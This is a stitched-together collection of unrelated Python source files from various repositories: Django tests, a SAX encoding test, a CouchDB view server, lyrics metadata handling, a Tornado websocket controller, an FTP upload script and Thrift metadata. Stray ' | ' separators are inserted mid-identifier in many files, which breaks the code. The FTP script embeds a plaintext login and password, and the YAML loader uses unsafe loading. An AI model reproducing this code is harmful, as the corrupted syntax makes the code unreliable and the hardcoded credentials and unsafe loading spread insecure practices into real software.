res = self.client.post(reverse('annotatetext-post_annotation'),
{'selection_start': 7,
'selection_end': 14,
'flags': 0,
'color': '#000',
'lengthcheck': len(part.body),
'comment' : 'just perfect',
'object_id': part.id,
'content_type': ContentType.objects.get_for_model(part).id,
})
self.assertEqual(res.status_code, 302)
annotation = Annotation.objects.get(object_id=part.id,
content_type=ContentType.objects.get_for_model(part).id)
self.assertEqual(annotation.selection, 'perfect')
# ensure the activity has been recorded
stream = Action.objects.stream_for_actor(self.jacob)
self.assertEqual(stream.count(), 3)
self.assertEqual(stream[0].verb, 'started following')
self.assertEqual(stream[0].target.id, self.meeting_1.id)
self.assertEqual(stream[1].verb, 'got badge')
self.assertEqual(stream[2].verb, 'annotated')
self.assertEqual(stream[2].target.id, annotation.id)
# ensure we will see it on the committee page
annotations = self.committee_1.annotations
self.assertEqual(annotations.count(), 1)
self.assertEqual(annotations[0].comment, 'just perfect')
def testAnnotationForbidden(self):
self.jacob.groups.clear() # invalidate this user's email
self.assertTrue(self.client.login(username='jacob', password='JKM'))
part = self.meeting_1.parts.list()[0]
res = self.client.post(reverse('annotatetext-post_annotation'),
{'selection_start': 7,
'selection_end': 14,
'flags': 0,
'color': '#000',
'lengthcheck': len(part.body),
'comment' : 'just perfect',
'object_id': part.id,
'content_type': ContentType.objects.get_for_model(part).id,
})
self.assertEqual(res.status_code, 403) # 403 Forbidden. 302 means a user with unverified email has posted an annotation.
def tes | tCommitteeList(self):
res = self.client.get(reverse('committee-list'))
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'committees/commit | tee_list.html')
object_list = res.context['object_list']
self.assertEqual(map(just_id, object_list),
[ self.committee_1.id, self.committee_2.id, ])
def testCommitteeMeetings(self):
res = self.client.get(self.committee_1.get_absolute_url())
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res,
'committees/committee_detail.html')
object_list = res.context['meetings_list']
self.assertEqual(map(just_id, object_list),
[self.meeting_1.id, self.meeting_2.id, ],
'object_list has wrong objects: %s' % object_list)
def testLoginRequired(self):
res = self.client.post(reverse('committee-meeting',
kwargs={'pk': self.meeting_1.id}))
self.assertFalse(self.bill_1 in self.meeting_1.bills_first.all())
self.assertEqual(res.status_code, 302)
self.assertTrue(res['location'].startswith('%s%s' %
('http://testserver', settings.LOGIN_URL)))
def testConnectToMK(self):
self.assertTrue(self.client.login(username='jacob', password='JKM'))
res = self.client.post(reverse('committee-meeting',
kwargs={'pk': self.meeting_1.id}),
{'user_input_type': 'mk',
'mk_name': self.mk_1.name})
self.assertEqual(res.status_code, 302)
self.assertTrue(self.meeting_1 in self.mk_1.committee_meetings.all())
self.client.logout()
def testConnectToBill(self):
self.assertTrue(self.client.login(username='jacob', password='JKM'))
res = self.client.post(reverse('committee-meeting',
kwargs={'pk':
self.meeting_1.id}),
{'user_input_type': 'bill',
'bill_id': self.bill_1.id})
self.assertEqual(res.status_code, 302)
self.assertTrue(self.bill_1 in self.meeting_1.bills_first.all())
self.client.logout()
def tearDown(self):
self.meeting_1.delete()
self.meeting_2.delete()
self.committee_1.delete()
self.committee_2.delete()
self.jacob.delete()
self.group.delete()
self.bill_1.delete()
self.mk_1.delete()
|
tic-ull/defensatfc-proto | tfc_webapps/packages/suds-timestamp/tests/saxenc.py | Python | agpl-3.0 | 1,564 | 0.002558 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the (LGPL) GNU Lesser General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library Lesser General Public License for more details at
# ( http://www.gnu.org/licenses/lgpl.html ).
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# written by: Jeff Ortel ( jortel@redhat.com )
#
# sax encoding/decoding test.
#
from suds.sax.element import Element
from suds.sax.parser import Parser
xml = "<a>Me && <b>my</b> shadow's <i>dog</i> love to 'play' and sing "la,la,la";</a>"
p = Parser()
d = p.parse(string=xml)
a = d.root()
print 'A(parsed)=\n%s' % a
assert str(a) == xml
b = Element('a')
b.setText('Me && <b>my</b> shadow\'s <i>dog</i> lov | e to \'play\' and sing "la,la,la";')
print 'B(encoded)=\n%s' % b
assert str(b) == xml
print 'A(text-decoded)=\n%s' % a.getText()
print 'B(text-decoded)=\n%s' % b.getText()
assert a.getText() == b.getText()
print 'test pruning'
j = Element('A')
j.set('n', 1)
j.append(El | ement('B'))
print j
j.prune()
print j |
AoLab/SIMP | siml.py | Python | gpl-3.0 | 1,096 | 0 | #!/usr/bin/env python3
# In The Name Of God
# ========================================
# [] File Name : siml.py
#
# [] Creation Date : 27-04-2017
#
# [] Created By : Pa | rham Alvani (parham.alvani@gmail.com)
# =======================================
import click
import yaml
import os
models = {}
def load(package):
for root, dirs, files in os.walk(package):
for model_file in files:
with open(os.path.join(root, model_file), 'r') as f:
try:
model = yaml.load(f)
if model['package'] != '.%s' % root.replace('/', '.'):
| continue
click.echo('%s.%s' % (model['package'], model['name']))
models['%s.%s' % (model['package'], model['name'])] = model
except Exception:
pass
for model_package in dirs:
load(model_package)
@click.command()
@click.option('--package', prompt="SIML package", help='Target SIML package')
def load_cmd(package):
load(package)
if __name__ == '__main__':
load_cmd()
|
laroque/couchdb-python3 | couchdb/view.py | Python | bsd-3-clause | 7,191 | 0.000139 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2007-2008 Christopher Lenz
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
"""Implementation of a view server for functions written in Python."""
from codecs import BOM_UTF8
import logging
import os
import sys
import traceback
from types import FunctionType
fr | om couchdb import json
__all__ = ['main', 'run']
__docformat__ = 'restructuredtext en'
log = logging.getLogger('couchdb.view')
def run(input=sys.stdin, output=sys.stdout):
r"""CouchDB view function handler implementation for Python.
:param input: the readable file-like object to read input from
:param output: the writable file-like object to write output to
"""
functions = []
def _writej | son(obj):
obj = json.encode(obj)
output.write(obj)
output.write('\n')
output.flush()
def _log(message):
if not isinstance(message, str):
message = json.encode(message)
_writejson({'log': message})
def reset(config=None):
del functions[:]
return True
def add_fun(string):
string = BOM_UTF8 + string.encode('utf-8')
globals_ = {}
try:
exec(string, {'log': _log}, globals_)
except Exception as e:
return {'error': {
'id': 'map_compilation_error',
'reason': e.args[0]
}}
err = {'error': {
'id': 'map_compilation_error',
'reason': 'string must eval to a function '
'(ex: "def(doc): return 1")'
}}
if len(globals_) != 1:
return err
function = list(globals_.values())[0]
if type(function) is not FunctionType:
return err
functions.append(function)
return True
def map_doc(doc):
results = []
for function in functions:
try:
results.append([[key, value] for key, value in function(doc)])
except Exception as e:
log.error('runtime error in map function: %s', e,
exc_info=True)
results.append([])
_log(traceback.format_exc())
return results
def reduce(*cmd, **kwargs):
code = BOM_UTF8 + cmd[0][0].encode('utf-8')
args = cmd[1]
globals_ = {}
try:
exec(code, {'log': _log}, globals_)
except Exception as e:
log.error('runtime error in reduce function: %s', e,
exc_info=True)
return {'error': {
'id': 'reduce_compilation_error',
'reason': e.args[0]
}}
err = {'error': {
'id': 'reduce_compilation_error',
'reason': 'string must eval to a function '
'(ex: "def(keys, values): return 1")'
}}
if len(globals_) != 1:
return err
function = list(globals_.values())[0]
if type(function) is not FunctionType:
return err
rereduce = kwargs.get('rereduce', False)
results = []
if rereduce:
keys = None
vals = args
else:
if args:
keys, vals = list(zip(*args))
else:
keys, vals = [], []
if function.__code__.co_argcount == 3:
results = function(keys, vals, rereduce)
else:
results = function(keys, vals)
return [True, [results]]
def rereduce(*cmd):
# Note: weird kwargs is for Python 2.5 compat
return reduce(*cmd, **{'rereduce': True})
handlers = {'reset': reset, 'add_fun': add_fun, 'map_doc': map_doc,
'reduce': reduce, 'rereduce': rereduce}
try:
while True:
line = input.readline()
if not line:
break
try:
cmd = json.decode(line)
log.debug('Processing %r', cmd)
except ValueError as e:
log.error('Error: %s', e, exc_info=True)
return 1
else:
retval = handlers[cmd[0]](*cmd[1:])
log.debug('Returning %r', retval)
_writejson(retval)
except KeyboardInterrupt:
return 0
except Exception as e:
log.error('Error: %s', e, exc_info=True)
return 1
_VERSION = """%(name)s - CouchDB Python %(version)s
Copyright (C) 2007 Christopher Lenz <cmlenz@gmx.de>.
"""
_HELP = """Usage: %(name)s [OPTION]
The %(name)s command runs the CouchDB Python view server.
The exit status is 0 for success or 1 for failure.
Options:
--version display version information and exit
-h, --help display a short help message and exit
--json-module=<name> set the JSON module to use ('simplejson', 'cjson',
or 'json' are supported)
--log-file=<file> name of the file to write log messages to, or '-' to
enable logging to the standard error stream
--debug enable debug logging; requires --log-file to be
specified
Report bugs via the web at <http://code.google.com/p/couchdb-python>.
"""
def main():
"""Command-line entry point for running the view server."""
import getopt
from couchdb import __version__ as VERSION
try:
option_list, argument_list = getopt.gnu_getopt(
sys.argv[1:], 'h',
['version', 'help', 'json-module=', 'debug', 'log-file=']
)
message = None
for option, value in option_list:
if option in ('--version'):
message = _VERSION % dict(name=os.path.basename(sys.argv[0]),
version=VERSION)
elif option in ('-h', '--help'):
message = _HELP % dict(name=os.path.basename(sys.argv[0]))
elif option in ('--json-module'):
json.use(module=value)
elif option in ('--debug'):
log.setLevel(logging.DEBUG)
elif option in ('--log-file'):
if value == '-':
handler = logging.StreamHandler(sys.stderr)
handler.setFormatter(logging.Formatter(
' -> [%(levelname)s] %(message)s'
))
else:
handler = logging.FileHandler(value)
handler.setFormatter(logging.Formatter(
'[%(asctime)s] [%(levelname)s] %(message)s'
))
log.addHandler(handler)
if message:
sys.stdout.write(message)
sys.stdout.flush()
sys.exit(0)
except getopt.GetoptError as error:
message = '%s\n\nTry `%s --help` for more information.\n' % (
str(error), os.path.basename(sys.argv[0])
)
sys.stderr.write(message)
sys.stderr.flush()
sys.exit(1)
sys.exit(run())
if __name__ == '__main__':
main()
|
ctogle/dilapidator | src/dilap/BROKEN/destruct.py | Python | mit | 951 | 0.010515 | import dilap.core.uinfo as di
import dilap.core.sgraph as dsg
import dilap.core.model as dm
import dilap.io.io as dio
import dilap.degenerate.overgrown as dog
import pdb
iotypes = dio.iotypes
###############################################################################
### simple functions which return simple dilapidors
###############################################################################
def overgrown(z_max = 10):
ivy = dog.ivy(z_max = z_max)
return ivy
###############################################################################
### convenient collections of functions
############################################## | #################################
# dilapidors is a dict of funcs which return dilapidor objects
d | ilapidors = {
'ivy':overgrown,
}
###############################################################################
|
lamotriz/lavagem-a-seco | src/main.py | Python | gpl-2.0 | 8,904 | 0.005759 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# PROJETO LAVAGEM A SECO
#
# MAIN
#
# Felipe Bandeira da Silva
# 26 jul 15
#
import logging
import tornado.escape
import tornado.ioloop
import tornado.web
import tornado.options
import tornado.websocket
import tornado.httpserver
import os.path
from tornado.concurrent import Future
from tornado import gen
from tornado.options import define, options, parse_command_line
import socket
import fcntl
import struct
import random
define("port", default=8888, help="run on the given port", type=int)
define("debug", default=False, help="run in debug mode")
import multiprocessing
import controle
import time
import os
import signal
import subprocess
import sys
from platform import uname
#NAVEGADOR = 'epiphany'
NAVEGADOR = 'midori -e Fullscreen -a'
# A pagina HTML contém informações interessantes e que devem ser
# apresentadas ao usuário. Quanto menor o tempo maior o processamento
# por parte do cliente ou dependendo do caso pelo servidor.
TEMPO_MS_ATUALIZACAO_HTML = 500
# Via websocket é possível mais um cliente conectado e todos devem
# receber as mensagens do servidor, bem como enviar.
# clientes do websocket
clients = []
# tarefa para atualizacao do pagina html
queue_joyx = multiprocessing.Queue()
queue_joyy = multipr | ocessing.Queue()
queue_joyz = multiprocessing.Queue()
# anemometro
queue_velocidade = multiprocessing.Queue()
queue_direcao = multiprocessing.Queue()
queue_distancia = multiprocessing.Queue()
# usado para o controle da página pelo joystick
queue_joy_botoes = multiprocessing.Queue()
#class NavegadorWEB(multiprocessi | ng.Process):
# def __init__(self):
# multiprocessing.Process.__init__(self)
#
# self.navegador = subprocess.Popen(['epiphany-browser 192.168.42.1:8888'], stdout=subprocess.PIPE, \
# shell=True, preexec_fn=os.setsid)
#
# def run(self):
# while True:
# time.sleep(0.01)
def inicia_navegador():
navegador = subprocess.Popen([NAVEGADOR+' 192.168.42.1:8888'], \
stdout=subprocess.PIPE, \
shell=True, preexec_fn=os.setsid)
def fecha_navegador():
processos = subprocess.Popen(['pgrep', NAVEGADOR], stdout=subprocess.PIPE)
print 'PID dos processos', processos.stdout
for pid in processos.stdout:
os.kill(int(pid), signal.SIGTERM)
try:
time.sleep(3)
os.kill(int(pid), 0)
print u'erro: o processo %d ainda existe' % pid
except OSError as ex:
continue
def get_ip_address():
# Informa o endereço IP da primeira conexão funcionando
# visto em:
# http://code.activestate.com/recipes/439094-get-the-ip-address-associated-with-a-network-inter/
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
ifname = 'eth0'
return socket.inet_ntoa(fcntl.ioctl( \
s.fileno(), \
0x8915, # SIOCGIFADDR \
struct.pack('256s', ifname[:15]) \
)[20:24])
except:
try:
ifname = 'wlan0'
return socket.inet_ntoa(fcntl.ioctl( \
s.fileno(), \
0x8915, # SIOCGIFADDR \
struct.pack('256s', ifname[:15]) \
)[20:24])
except:
return "127.0.0.1"
def get_ip_address_interface(ifname):
# Informa o endereço de IP de uma rede <ifname>
# visto em:
# http://code.activestate.com/recipes/439094-get-the-ip-address-associated-with-a-network-inter/
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
return socket.inet_ntoa(fcntl.ioctl( \
s.fileno(), \
0x8915, # SIOCGIFADDR \
struct.pack('256s', ifname[:15]) \
)[20:24])
except:
return "0.0.0.0"
class MainHandler(tornado.web.RequestHandler):
# Atende ao GET e POST do cliente
def get(self):
# é possível via argumento renderizar a página html com
# informações interessantes, os comentários devem ter o mesmo
# nome da variável da página
self.render("index.html", title="LAVAGEM A SECO", \
ip_host=get_ip_address()+":"+str(options.port), \
msg_status="LIGADO")
class WebSocketHandler(tornado.websocket.WebSocketHandler):
# Todo cliente se encarrega de conectar-se ao servidor websocket.
# Quando existe uma nova conexão é salvo qual cliente foi.
def open(self):
print 'tornado: websocket: aviso: nova conexão de um cliente'
clients.append(self)
self.write_message("connected")
# Quando um cliente envia uma mensagem, esta é a função responsável
# por ler e aqui deve ficar a chamada dos get das filas(queue)
def on_message(self, message):
print 'tornado: websocket: aviso: nova mensagem: %s' % message
q = self.application.settings.get('queue')
q.put(message)
# Para evitar envios de informações a clientes que não existem mais
# é necessário retirá-los da lista
def on_close(self):
print 'tornado: websocket: aviso: conexão finalizada/perdida'
clients.remove(self)
fecha_navegador()
inicia_navegador()
def envia_cmd_websocket(cmd, arg):
# Facilita o trabalho repetitivo de envia mensagem para todo os clientes
# Envia um comando e seu argumento para todos os clientes
for c in clients:
c.write_message(cmd+";"+arg)
def tarefa_atualizacao_html():
# Esta função tem uma chamada periódica, responsável por atualizar os
# elementos atualizáveis na página html
envia_cmd_websocket("lan", get_ip_address())
envia_cmd_websocket("random", str(random.randint(0,1000)))
# para envia algo é necessário que fila tenha algo
if not queue_joyx.empty():
resultado = queue_joyx.get()
envia_cmd_websocket("joyx", str(resultado)[:6])
if not queue_joyy.empty():
resultado = queue_joyy.get()
envia_cmd_websocket("joyy", str(resultado)[:6])
if not queue_joyz.empty():
resultado = queue_joyz.get()
envia_cmd_websocket("joyz", str(resultado)[:6])
if not queue_joy_botoes.empty():
resultado = queue_joy_botoes.get()
envia_cmd_websocket("b", str(resultado))
if not queue_velocidade.empty():
resultado = queue_velocidade.get()
envia_cmd_websocket("v", str(resultado))
if not queue_direcao.empty():
resultado = queue_direcao.get()
envia_cmd_websocket("d", str(resultado))
if not queue_distancia.empty():
resultado = queue_distancia.get()
envia_cmd_websocket("x", str(resultado)[:6])
def main():
print u"Iniciando o servidor Tornado"
fecha_navegador()
tarefa_controle = multiprocessing.Queue()
# esse loop ler os dados do joystick e envia para o lavos
# sem ele, nenhuma resposta do Joystick é atendida.
controle_loop = controle.ControleLavagem(tarefa_controle, \
queue_joyx, \
queue_joyy, \
queue_joyz, \
queue_joy_botoes, \
queue_velocidade, \
queue_direcao, \
queue_distancia)
controle_loop.daemon = True
controle_loop.start()
# espera um pouco para que a tarefa esteja realmente pronta
# sincronismo é mais interessante?
time.sleep(1)
tarefa_controle.put("Testando Tarefa :)")
parse_command_line()
app = tornado.web.Application(
[
(r"/", MainHandler),
(r"/ws", WebSocketHandler)
],
cookie_secret="__TODO:_GENERATE_YOUR_OWN_RANDOM_VALUE_HERE__",
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
xsrf_cookies=True,
debug=options.debug,
autoreload=True,
queue=tarefa_controle,
)
# porta que o serv |
tommasoberlose/p2p_gnutella | Constant.py | Python | mit | 610 | 0.001639 | PORT = "3000"
LENGTH_PORT = 5
TTL = "2"
LENGTH_TTL = 2
ERROR_PKT = "0000"
LIST_PKT = []
LENGTH_PKTID = 16
LENGTH_FILENAME = 100
LENGTH_QUERY = 20
LENGTH_SECTION_IPV4 = 3
LENGTH_SECTION_IPV6 = | 4
LENGTH_PACK = 1024
LENGTH_NCHUNK = 5
| LENGTH_NCHUNKS = 6
LENGTH_HEADER = 10
CODE_QUERY = "QUER"
CODE_ANSWER_QUERY = "AQUE"
CODE_NEAR = "NEAR"
CODE_ANSWER_NEAR = "ANEA"
CODE_DOWNLOAD = "RETR"
CODE_ANSWER_DOWNLOAD = "ARET"
CODE_LOGO = "LOGO"
FILE_COND = "FileCondivisi/"
ERROR_FILE = "FILE_NOT_FOUND"
NUM_NEIGHBOR = 3
START_RED = "\033[91m"
END_RED = "\033[0m"
START_GREEN = "\033[92m"
END_GREEN = "\033[0m" |
osdlyrics/osdlyrics | python/metadata.py | Python | gpl-3.0 | 13,271 | 0.000678 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2011 Tiger Soldier
#
# This file is part of OSD Lyrics.
#
# OSD Lyrics is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# OSD Lyrics is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with OSD Lyrics. If not, see <https://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from builtins import object
import logging
import re
import dbus
from .consts import METADATA_ALBUM, METADATA_ARTIST, METADATA_TITLE
class Metadata(object):
"""
Metadata of a track
This class helps to deal with different metadata formats defined by MPRIS1,
MPRIS2 and OSD Lyrics. It is recommended to parse a metadata dict from D-Bus
with `Metadata.from_dict()`.
Metadata provides following properties: `title`, `artist`, `album`, `location`,
`arturl`, `length`, and `tracknum`, where `length` and `tracknum` are integers,
the others are strings.
"""
# Possible MPRIS metadata keys, taken from
# http://xmms2.org/wiki/MPRIS_Metadata#MPRIS_v1.0_Metadata_guidelines"""
MPRIS1_KEYS = set(['genre', 'comment', 'rating', 'year', 'date', 'asin',
'puid fingerprint', 'mb track id', 'mb artist id',
'mb artist sort name', 'mb album id', 'mb release date',
'mb album artist', 'mb album artist id',
'mb album artist sort name', 'audio-bitrate',
'audio-samplerate', 'video-bitrate'])
# Possible MPRIS2 metadata keys, taken from
# http://www.freedesktop.org/wiki/Specifications/mpris-spec/metadata
MPRIS2_KEYS = set(['xesam:albumArtist', 'xesam:asText', 'xesam:audioBPM',
'xesam:autoRating', 'xesam:comment', 'xesam:composer',
'xesam:contentCreated', 'xesam:discNumber', 'xesam:firstUsed',
'xesam:genre', 'xesam:lastUsed', 'xesam:lyricist',
'xesam:useCount', 'xesam:userRating'])
def __init__(self,
title=None,
artist=None,
album=None,
arturl=None,
tracknum=-1,
location=None,
length=-1,
extra={}):
"""
Create a new Metadata instance.
| Arguments:
- `title`: (string) The title of the track
- `artist`: (string) The artist of the track
- `album`: (string) The name of album that the track is in
- `arturl`: (string) The URI of the picture of the cover of the album
- `tracknum`: (int) The number of the track
- `location`: (string) The URI of the file
| - `length`: (int) The duration of the track in milliseconds.
- `extra`: (dict) A dict that is intend to store additional properties
provided by MPRIS1 or MPRIS2 DBus dicts. The MPRIS1-related
values will be set in the dict returned by `to_mpris1`. The
MPRIS2-related values are treated in a similar way.
"""
self.title = title
self.artist = artist
self.album = album
self.arturl = arturl
self.tracknum = tracknum
self.location = location
self.length = length
self._extra = extra
def __eq__(self, other):
"""
Two metadatas are equal if:
- The locations are not empty and are equal, or
- The titles, artists and albums are equal.
See also: src/ol_metadata.c:ol_metadata_equal, thougn they aren't consistent.
"""
if self is other:
return True
if self.location == other.location and self.location != '':
return True
for key in [METADATA_TITLE, METADATA_ARTIST, METADATA_ALBUM]:
if getattr(self, key) != getattr(other, key):
return False
return True
def to_mpris1(self):
"""
Converts the metadata to mpris1 dict
"""
ret = dbus.Dictionary(signature='sv')
for k in ['title', 'artist', 'album', 'arturl', 'location']:
if getattr(self, k) is not None:
ret[k] = dbus.String(getattr(self, k))
if self.tracknum >= 0:
ret['tracknumber'] = dbus.String(self.tracknum)
if self.length >= 0:
ret['time'] = dbus.UInt32(self.length // 1000)
ret['mtime'] = dbus.UInt32(self.length)
for k, v in self._extra.items():
if k in self.MPRIS1_KEYS and k not in ret:
ret[k] = v
return ret
def to_mpris2(self):
"""
Converts the metadata to mpris2 dict
>>> mt = Metadata(title='Title', artist='Artist1, Artist2,Artist3',
... album='Album', arturl='file:///art/url',
... location='file:///path/to/file', length=123,
... tracknum=456,
... extra={ 'title': 'Fake Title',
... 'xesam:album': 'Fake Album',
... 'xesam:useCount': 780,
... 'xesam:userRating': 1.0,
... 'custom value': 'yoooooo',
... })
>>> dict = mt.to_mpris2()
>>> print(dict['xesam:title'])
Title
>>> print(dict['xesam:artist'])
[dbus.String('Artist1'), dbus.String('Artist2'), dbus.String('Artist3')]
>>> print(dict['xesam:url'])
file:///path/to/file
>>> print(dict['mpris:artUrl'])
file:///art/url
>>> print(dict['mpris:length'])
123
>>> print(dict['xesam:trackNumber'])
456
>>> print(dict['xesam:userRating'])
1.0
>>> 'custom value' in dict
False
>>> mt2 = Metadata.from_dict(dict)
>>> print(mt2.title)
Title
>>> print(mt2.artist)
Artist1, Artist2, Artist3
>>> print(mt2.album)
Album
>>> print(mt2.location)
file:///path/to/file
"""
ret = dbus.Dictionary(signature='sv')
mpris2map = {'title': 'xesam:title',
'album': 'xesam:album',
'arturl': 'mpris:artUrl',
'location': 'xesam:url',
}
for k in ['title', 'album', 'arturl', 'location']:
if getattr(self, k) is not None:
ret[mpris2map[k]] = dbus.String(getattr(self, k))
if self.artist is not None:
ret['xesam:artist'] = [dbus.String(v.strip()) for v in self.artist.split(',')]
if self.length >= 0:
ret['mpris:length'] = dbus.Int64(self.length)
if self.tracknum >= 0:
ret['xesam:trackNumber'] = dbus.Int32(self.tracknum)
for k, v in self._extra.items():
if k in self.MPRIS2_KEYS and k not in ret:
ret[k] = v
return ret
@classmethod
def from_mpris2(cls, mpris2_dict):
"""
Create a Metadata object from mpris2 metadata dict
"""
string_dict = {'title': 'xesam:title',
'album': 'xesam:album',
'arturl': 'mpris:artUrl',
'location': 'xesam:url',
}
string_list_dict = {'artist': 'xesam:artist'}
kargs = {}
for k, v in string_dict.items():
if v in mpris2_dict:
kargs[k] = mpris2_dict[v]
for k, v in string_list_dict.items():
if v in mpris2_dict:
kargs[k] = ', '.join(mpris2_dict[v])
if 'xesam:trackNumber' in mpris2_dict:
kargs['tracknum'] = int(mpris2_dict['xesam:trackNumber'])
if |
ACLARKNET/aclarknet-database | aclarknet/database/migrations/0040_auto_20170902_1841.py | Python | mit | 694 | 0 | # -*- coding: utf-8 -*-
# Generated b | y Django 1.11.4 on 2017-09-02 22:41
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('database', '0039_auto_20170902_1834'),
]
operations = [
migrations.RemoveField(
model_name='companysettings',
name='note',
),
migrations.Remo | veField(
model_name='service',
name='company',
),
migrations.RemoveField(
model_name='testimonial',
name='company',
),
migrations.DeleteModel(
name='CompanySettings',
),
]
|
chrisRubiano/TAP | dolar/ftp.py | Python | gpl-3.0 | 494 | 0.004049 | from __future__ import print_function
import os
from ftplib import FTP
def place_file(ftp, filename):
ftp.storbinary('STOR ' + filename,open(fi | lename, 'rb'))
if __name__ == '__main__':
url = 'ftp.k-bits.com'
ftp = FTP(url)
user = 'usuario1@k-bits.com'
passw = 'happy1234'
ftp.login(user, passw)
remoto = []
ftp.dir(remoto.append)
for r in remoto:
print(r)
directorio_local = os.listdir( | '.')
place_file(ftp, 'Banamex.csv')
ftp.quit()
|
facebook/fbthrift | thrift/compiler/test/fixtures/basic/gen-py3lite/module/lite_metadata.py | Python | apache-2.0 | 13,649 | 0.010697 | #
# Autogenerated by Thrift
#
# DO NOT EDIT
# @generated
#
import apache.thrift.metadata.lite_types as _fbthrift_metadata
# TODO (ffrancet): This general pattern can be optimized by using tuples and dicts
# instead of re-generating thrift structs
def _fbthrift_gen_metadata_struct_MyStruct(metadata_struct: _fbthrift_metadata.ThriftMetadata) -> _fbthrift_metadata.ThriftMetadata:
qualified_name = "module.MyStruct"
if qualified_name in metadata_struct.structs:
return metadata_struct
fields = [
_fbthrift_metadata.ThriftField(id=1, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_I64_TYPE), name="MyIntField", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=2, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_STRING_TYPE), name="MyStringField", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=3, type=_fbthrift_metadata.ThriftType(t_struct=_fbthrift_metadata.ThriftStructType(name="module.MyDataItem")), name="MyDataField", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=4, type=_fbthrift_metadata.ThriftType(t_enum=_fbthrift_metadata.ThriftEnumType(name="module.MyEnum")), name="myEnum", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=5, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_BOOL_TYPE), name="oneway", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=6, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_BOOL_TYPE), name="readonly", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=7, type=_fbthrift_metadata.ThriftType(t_primitive=_fbthrift_metadata.ThriftPrimitiveType.THRIFT_BOOL_TYPE), name="idempotent", is_optional=False, structured_annotations=[
]),
]
struct_dict = dict(metadata_struct.structs)
struct_dict[qualified_name] = _fbthrift_metadata.ThriftStruct(name=qualified_name, fields=fields,
is_union=False,
structured_annotations=[
])
new_struct = metadata_struct(structs=struct_dict)
# MyIntField
# MyStringField
new_struct = _fbthrift_gen_metadata_struct_MyDataItem(new_struct) # MyDataField
new_struct = _fbthrift_gen_metadata_enum_MyEnum(new_struct) # myEnum
# oneway
# readonly
# idempotent
return new_struct
def gen_metadata_struct_MyStruct() -> _fbthrift_metadata.ThriftMetadata:
return _fbthrift_gen_metadata_struct_MyStruct(_fbthrift_metadata.ThriftMetadata(structs={}, enums={}, exceptions={}, services={}))
# TODO (ffrancet): This general pattern can be optimized by using | tuples and dicts
# instead of re-generating thrift structs
def _fbthrift_gen_metadata_struct_MyDataItem(metadata_struct: _fbthrift_metadata.ThriftMetadata) -> _fbthrift_metadata.ThriftMetadata:
qualified_name = "module.MyDataItem"
if qual | ified_name in metadata_struct.structs:
return metadata_struct
fields = [
]
struct_dict = dict(metadata_struct.structs)
struct_dict[qualified_name] = _fbthrift_metadata.ThriftStruct(name=qualified_name, fields=fields,
is_union=False,
structured_annotations=[
])
new_struct = metadata_struct(structs=struct_dict)
return new_struct
def gen_metadata_struct_MyDataItem() -> _fbthrift_metadata.ThriftMetadata:
return _fbthrift_gen_metadata_struct_MyDataItem(_fbthrift_metadata.ThriftMetadata(structs={}, enums={}, exceptions={}, services={}))
# TODO (ffrancet): This general pattern can be optimized by using tuples and dicts
# instead of re-generating thrift structs
def _fbthrift_gen_metadata_struct_MyUnion(metadata_struct: _fbthrift_metadata.ThriftMetadata) -> _fbthrift_metadata.ThriftMetadata:
qualified_name = "module.MyUnion"
if qualified_name in metadata_struct.structs:
return metadata_struct
fields = [
_fbthrift_metadata.ThriftField(id=1, type=_fbthrift_metadata.ThriftType(t_enum=_fbthrift_metadata.ThriftEnumType(name="module.MyEnum")), name="myEnum", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=2, type=_fbthrift_metadata.ThriftType(t_struct=_fbthrift_metadata.ThriftStructType(name="module.MyStruct")), name="myStruct", is_optional=False, structured_annotations=[
]),
_fbthrift_metadata.ThriftField(id=3, type=_fbthrift_metadata.ThriftType(t_struct=_fbthrift_metadata.ThriftStructType(name="module.MyDataItem")), name="myDataItem", is_optional=False, structured_annotations=[
]),
]
struct_dict = dict(metadata_struct.structs)
struct_dict[qualified_name] = _fbthrift_metadata.ThriftStruct(name=qualified_name, fields=fields,
is_union=True,
structured_annotations=[
])
new_struct = metadata_struct(structs=struct_dict)
new_struct = _fbthrift_gen_metadata_enum_MyEnum(new_struct) # myEnum
